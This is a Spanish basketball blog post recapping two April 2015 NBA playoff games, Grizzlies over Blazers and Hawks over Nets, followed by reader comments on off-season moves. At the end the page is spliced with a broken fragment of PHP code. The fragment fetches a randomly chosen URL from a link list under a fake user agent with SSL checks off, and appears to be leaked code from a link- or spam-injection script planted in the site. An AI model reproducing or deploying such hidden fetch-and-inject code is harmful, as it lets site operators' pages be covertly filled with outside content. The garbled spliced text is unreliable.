La Crónica: Los Grizzlies ya están en semifinales

30 de April de 2015 por txusma

Victoria de los Grizzlies que les sitúa de nuevo en semifinales de conferencia. Los Blazers han peleado pero finalmente han sucumbido a las adversidades que les han golpeado durante todo el año. Además, sus 2 grandes estrellas (Aldridge y Lilllard) parecen no haber llegado en su mejor momento y eso es algo a lo que prácticamente ningún equipo puede sobreponerse. En la otra serie en liza, victoria trabajadísima de los Hawks, y eso que apostábamos por la barrida. Los Nets se defienden como gato panza arriba y en estos momentos no nos extrañaría que la eliminatoria se resolviese en un séptimo partido.

Portland TrailBlazers 93 – Memphis Grizzlies 99

Los Grizzlies ya están en semifinales de conferencia por tercera vez en 5 años y ahora gozarán de unos necesarios días de descanso antes de enfrentarse el domingo a los Warriors. Sabiendo que no podían permitirse ningún desliz, los pupilos de David Joerger salieron muy concentrados y en apenas 4 minutos y medio ya habían acumulado una ventaja de 12 puntos gracias principalmente a Zach Randolph. Sin embargo, a partir de ese momento se les apagó la luz y los Blazers, con Damian Lillard y un gran CJ McCollum como estiletes, empataron de nuevo el partido y llegaron a ponerse por delante durante el segundo cuarto. Entre los minutos previos al descanso y los siguientes a la reanudación los locales consiguieron un parcial de 18-4 que les otorgaba 13 puntos de ventaja pero en ese momento apareció  de nuevo la figura de CJ McCollum que anotó 4 triples y acabó el cuarto con 16 puntos. Su aportación, unida a la de un Lamarcus Aldridge muy flojo en líneas generales permitió a los Blazers empezar el último cuarto sólo 2 puntos abajo. El último periodo corrió igualado hasta que un parcial de 0-9 con Jeff Green como protagonista inclinó definitivamente la balanza. Portland intentó remontar pero Marc Gasol acabó de amarrar el resultado desde la línea de tiros libres.

MVP: Marc Gasol (26 puntos, 14 rebotes, 3 asistencias y 2 tapones) 

Brooklyn Nets 97 – Atlanta Hawks 107

Los Hawks no pasan por su mejor momento (acumulan 10 derrotas en sus últimos 19 partidos) y seguramente por eso sus jugadores salieron más conscienciados que nunca y con ganas de demostrar que pueden volver a ser el equipo que maravillaba en los 3 primeros cuartos de la liga regular. Ante esta determinación los Nets no pudieron hacer nada, solo comprobar como los locales consiguían 17 puntos de diferencia al final del primer cuarto. Pero en la reanudación y con las segundas unidades en pista, los Nets consiguieron un parcial de 11-0 que les volvía a meter en el partido. Alan Anderson (14 puntos en el 2º cuarto) se comió con patatas a Bazemore y obligó que Demarre Carroll (19 puntos en la 1ª parte) y Jeff Teague volvieran rápidamente a la pista. Hasta el final del tercer cuarto los locales mantuvieron distancias que rondaban los 10 puntos gracias en buena parte al acierto de Kyle Korver desde más allá de la línea pero en el último cuarto los Nets llegaron a colocarse a un sólo punto a falta de 4:40 para el final gracias a Jarret Jack que anotó 12 puntos en los últimos 12 minutos. Fue lo más cerca que estuvieron los Nets de la victoria y eso que un par de triples de Joe Johnson pusieron el ay en el cuerpo de los aficionados de Atlanta. Al final entre Jeff Teague y Demarre Carroll mataron el partido. No hace falta que preguntéis qué tal le fue a Deron Williams anoche…

 MVP: Demarre Carroll (24 puntos, 7 rebotes) y Al Horford (20 puntos, 15 rebotes y 5 asistencias)

Comenta

5 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    A ver qué le depara el verano a los Blazers…yo pagaría dinero por ver en un mismo equipo a Aldridge y Duncan,y ya salen rumores de Cuban tirando de “clubbing” (recordad lo de Parsons) para reclutar a LaMarcus y DeAndre Jordan.No sé,muy incierto todo,y con esta manera de caer ante Memphis,0 opciones durante toda la serie,parece que la cosa invita a pensar en que habrá reconstrucción en Oregon. Pequeños brotes verdes en McCollum y Leonard,pero con Lillard -24 años y habiendo demostrado que está para cosas importantes- tienen que juntar un equipo competitivo y si se va Aldridge,igual van de la mano Matthews y Robin Lopez.Complicado todo.

    Lo de Hawks y Nets fue un partido muy extraño.Parecía dominado por Atlanta,en marcador y sensaciones,pero último cuarto -los Nets han ganado en todos los partidos ese parcial- y ahí Brooklyn con Jack a la cabeza acongojó a cualquiera que llevara la camiseta de los Hawks.La verdad que parecía que las circunstancias superaban a Atlanta,pero encontraron la senda.Eso sí,a mí no me ofrecen garantías de nada,ni de finiquitar la serie en el siguiente encuentro,de pasar la eliminatoria,de derrotar a los Wizards…

    Parece cercano la firma de Billy Donovan por los Thunder,desde Florida.Sería buen fichaje en cuanto al nivel defensivo que ha conseguido meter a nivel NCAA,que veremos si es capaz de trasladar a la NBA,pero vamos parece que se opta por un tío que consiga desarrollar todo el potencial defensivo de Oklahoma.

      Citar

  2. Jose Luis dice:
    #2

    También hay que pensar que son los Blazers… no firman un agente libre importante desde ¿hace cuanto?

    No todas las franquicias pueden aspirar al anillo, y en el oeste es durísimo. No sé, 52 victorias no son pocas, han ganado su división… no se les puede exigir a todos lo mismo :S Si se libran de Aldridge, mas vale que sea sign&trade, porque si no… pf

    Hawks vs Wizards si los veo más favoritos que vs Nets. Estos Nets tienen jugadores de PO, Wizards solo a Pierce y quizá Nené…

      Citar

  3. Triceratops dice:
    #3

    Rob Hennigan, manager de los Magic, renovado hasta 2018. Su balance en estos 3 años es….. 68-178.

      Citar

  4. Txusma dice:
    #4

    Triceratops:
    Rob Hennigan, manager de los Magic, renovado hasta 2018. Su balance en estos 3 años es….. 68-178.

    Hombre, no ha drafteado mal y se ha hecho com Vucevic y Tobias via trade… Ahora es cuando empieza el trabajo de verdad.

      Citar

  5. Jose Luis dice:
    #5

    pues yo lo veo fatal xd

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>